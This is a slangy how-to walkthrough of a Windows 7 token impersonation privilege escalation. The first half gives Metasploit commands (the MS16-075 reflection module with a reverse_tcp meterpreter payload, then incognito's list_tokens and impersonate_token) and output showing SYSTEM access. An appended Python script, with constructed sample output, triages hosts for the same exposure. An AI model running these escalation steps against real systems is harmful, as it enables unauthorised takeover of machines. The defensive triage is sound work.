Some buggers might try to copy another bloke's access token and pretend to be them, so they get more power and sneak past the security checks. A cheeky one can make a new access token that's a copy of an existing one using DuplicateToken(Ex), then call ImpersonateLoggedOnUser so the calling thread runs in that logged-on user's security context.
In this how-to, we'll be having a go at doing a token impersonation attack.
For this part, our target system will be runnin' Windows 7. Before we start, make sure you've already got your foot in the door on the system and have a meterpreter session goin'.
Let's get stuck into it by followin' these steps:
First up, we need to find any weak spots that can be exploited through the Potato attack. We can do this by usin' the Windows Exploit Suggester script:
./windows-exploit-suggester.py --database <DATABASE.XLSX> --systeminfo <SYSTEMINFO.TXT>
After runnin' that script, we can spot a token impersonation weak spot. Lookin' into the MS16-075 vulnerability, we find a Metasploit module that can do the token impersonation attack automatically.
To load the module in Metasploit, run this:
msf> use exploit/windows/local/ms16_075_reflection
Once it's loaded, you gotta set the module options. Do that by runnin' these commands (note the payload path has no leading slash):
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> set SESSION <SESSION-ID>
Now we're ready to run the module. Just type this:
msf> run
Alright, next up we gotta do the impersonation bit. We can do that by loadin' the incognito module on the meterpreter. Just run this command:
meterpreter> load incognito
Now we can use incognito to list all the tokens we can impersonate. Run this:
meterpreter> list_tokens -u
Have a look at that, we can see the "NT AUTHORITY\SYSTEM" token there. Ripper!
Alright, let's impersonate that "NT AUTHORITY\SYSTEM" token. Run this command:
meterpreter> impersonate_token "NT AUTHORITY\SYSTEM"
Now let's check that we've got those sweet, sweet elevated privileges. Run this in the meterpreter:
meterpreter> getuid
Boom, just like that we've successfully jacked up our access!
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
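The whole chain above only works because two things line up on the box: the account the attacker already holds carries an impersonation-capable privilege (SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, which is what the Potato family and the MS16-075 reflection module need), and the MS16-075 fix is missing. The script below is an added triage example, not part of the original how-to or the Windows Exploit Suggester, and it checks both preconditions from the text output a defender already collects with `systeminfo` and `whoami /priv`. The sample outputs are constructed for the demo, and the KB number for the MS16-075 update is left as a parameter, because it differs per Windows build and should be taken from the bulletin for the platform you are checking.

```python
"""Triage helper (added example): flag hosts where a service account holds an
impersonation privilege and the MS16-075 update is missing.  Works on the
plain-text output of `whoami /priv` and `systeminfo`; the samples below are
constructed for the demo, not captured from a real machine."""
import re

# Token privileges that let a process impersonate or assign another token.
# A privilege shown as "Disabled" still counts: the token holder can switch it
# on with AdjustTokenPrivileges, so only its absence from the token matters.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Placeholder: replace with the KB number from the MS16-075 bulletin for the
# OS build being checked (assumption: it is a single KB for that build).
REQUIRED_KB = "KB<MS16-075 update for this build>"

# Constructed `whoami /priv` output for a typical service account.
WHOAMI_PRIV_SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Disabled
"""

# Constructed `systeminfo` excerpt; the hotfix list is invented for the demo.
SYSTEMINFO_SAMPLE = """\
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
                           [03]: KB3138612
"""

# One row of the `whoami /priv` table: name, free-text description, state.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")
# One installed hotfix entry in the `systeminfo` hotfix section.
HOTFIX_LINE = re.compile(r"\[\d+\]:\s*(KB\d+)")


def parse_privileges(text):
    """Return {privilege_name: state} parsed from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def parse_hotfixes(text):
    """Return the set of KB identifiers listed in `systeminfo` output."""
    return set(HOTFIX_LINE.findall(text))


def impersonation_privs(privs):
    """Names of impersonation-capable privileges present on the token."""
    return sorted(p for p in privs if p in IMPERSONATION_PRIVS)


def triage(whoami_text, systeminfo_text, required_kb):
    """Combine both checks into one verdict.

    exposed is True only when an impersonation privilege is present AND the
    required update is not installed; either mitigation alone closes the path
    described in the how-to (patch the host, or run the service without
    SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege)."""
    held = impersonation_privs(parse_privileges(whoami_text))
    patched = required_kb in parse_hotfixes(systeminfo_text)
    return {
        "impersonation_privileges": held,
        "patched": patched,
        "exposed": bool(held) and not patched,
    }


if __name__ == "__main__":
    verdict = triage(WHOAMI_PRIV_SAMPLE, SYSTEMINFO_SAMPLE, REQUIRED_KB)
    for key, value in verdict.items():
        print(f"{key}: {value}")
```

Run it against real output by feeding the captured `whoami /priv` and `systeminfo` text into `triage()` with the correct KB; an `exposed: True` verdict means the host should be patched or the service account's impersonation privileges reviewed before anyone else finds the same token listed by `list_tokens -u`.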